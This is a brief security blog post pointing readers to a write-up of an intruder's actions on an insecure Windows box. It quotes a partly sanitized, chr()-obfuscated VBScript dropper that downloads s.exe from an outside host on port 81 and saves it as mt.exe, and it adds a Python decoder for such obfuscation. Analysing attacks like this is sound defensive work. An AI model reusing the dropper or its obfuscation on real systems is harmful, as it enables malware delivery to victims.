Hackers in the House
A rather interesting link was sent out a couple of days ago to the SecurityBasics mailing list. It documents the actions taken by a "hacker" after they had gained access to an insecure Windows box. While details of the exploit used and the system setup are not revealed, it is still interesting to read through and see the actions that are performed. Snort data and packet captures are included, although they have been heavily sanitized.
I would have to say that step 14 was by far the best, as it includes some scripting that was written to a file. When cleaned up, the code looks a little more like this:
execute(chr(8x)^&^chr(101)^&^chr(116)^&^chr(x2)^&^chr(120)^&^chr(80)^&^chr(111)^&^chr(115)^&^chr(116)^&^chr(x2)&^chr(61)^
&^chr(x2)^&^chr(67)^&^chr(11x)^&^chr(101)^&^chr(97)^&^chr(116)^&^chr(101)^&^chr(79)^&^chr(98)^&^chr(10)^&^chr(101)^&^
chr(99)^&^chr(116)^&^chr(x0)^&^chr(xx)^&^chr(77)^&^chr(105)^&^chr(99)^&^chr(11x)^&^chr(111)^&^chr115)^&^chr(111)^&
^chr(102)^&^chr(116)^&^chr(x6)^&^chr(88)^&^chr(77)^&^chr(76)^&^chr(72)^&^chr(8x)^&^chr(8x)^&^ch(80)^&^chr(xx)^&^chr(x1)
^&^chr(58)^&^chr(10))
xPost.Open ^"GET^",^"http://ZXMM.KMIP.NET:81/s.exe^",0
xPost.Send():Set sGet = CreateObject(^"ADODB.Stream^")
sGet.Mode =x
sGet.Type = 1:sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile ^"mt.exe^",2
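As an added analyst-side example (not code from the original post or from the write-up it links), here is a small Python decoder for this kind of chr()-concatenation obfuscation: it strips the cmd.exe caret escapes (assumed to be why the snippet contains ^&^ and ^"), collapses each chr(a)&chr(b)&... run into a readable quoted literal, and marks sanitized tokens such as chr(8x) with a '?' so the analyst knows which characters are still unknown. The sample input is constructed and builds a harmless MsgBox call.

```python
import re

# One chr(n) token; the argument may contain 'x' where the analyst sanitised
# the original (e.g. chr(8x)), so digits and x are both accepted.
CHR_TOKEN = re.compile(r"chr\s*\(\s*([0-9x]+)\s*\)", re.IGNORECASE)
# A run of tokens glued together with VBScript's '&' concatenation operator.
CHR_RUN = re.compile(
    r"chr\s*\(\s*[0-9x]+\s*\)(?:\s*&\s*chr\s*\(\s*[0-9x]+\s*\))*", re.IGNORECASE
)


def strip_cmd_escapes(text: str) -> str:
    """Drop cmd.exe '^' escape characters. They are left behind when a script
    is written to disk with 'echo' from a command shell (assumed origin of the
    '^&^' and '^"' sequences in the quoted snippet)."""
    return text.replace("^", "")


def decode_chr_concat(text: str) -> tuple:
    """Replace every chr(a)&chr(b)&... run with the quoted literal it builds.

    Returns (decoded_text, unresolved). Sanitised tokens such as chr(8x) cannot
    be decoded; each becomes '?' and is counted in unresolved so the reader
    knows how much of the recovered string is still unknown."""
    unresolved = 0

    def decode_run(match):
        nonlocal unresolved
        chars = []
        for arg in CHR_TOKEN.findall(match.group(0)):
            if "x" in arg.lower():
                unresolved += 1
                chars.append("?")
                continue
            code = int(arg)
            # Keep printable ASCII as-is; escape anything else so it stays visible.
            chars.append(chr(code) if 32 <= code < 127 else f"\\x{code:02x}")
        # Emit a VBScript string literal (embedded quotes are doubled).
        return '"' + "".join(chars).replace('"', '""') + '"'

    decoded = CHR_RUN.sub(decode_run, strip_cmd_escapes(text))
    return decoded, unresolved


# Constructed sample in the same shape as the quoted snippet (not the page's
# code): it builds a harmless MsgBox call, with one token sanitised like chr(8x).
SAMPLE = (
    "execute(chr(77)^&^chr(115)^&^chr(103)^&^chr(66)^&^chr(111)^&^chr(120)"
    "^&^chr(40)^&^chr(3x)^&^chr(41))"
)

if __name__ == "__main__":
    text, missing = decode_chr_concat(SAMPLE)
    print(text, missing)  # execute("MsgBox(?)") 1
```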
Anyways.... it won't take overly long to read, and it was definitely worth the read.
Peace,
HT
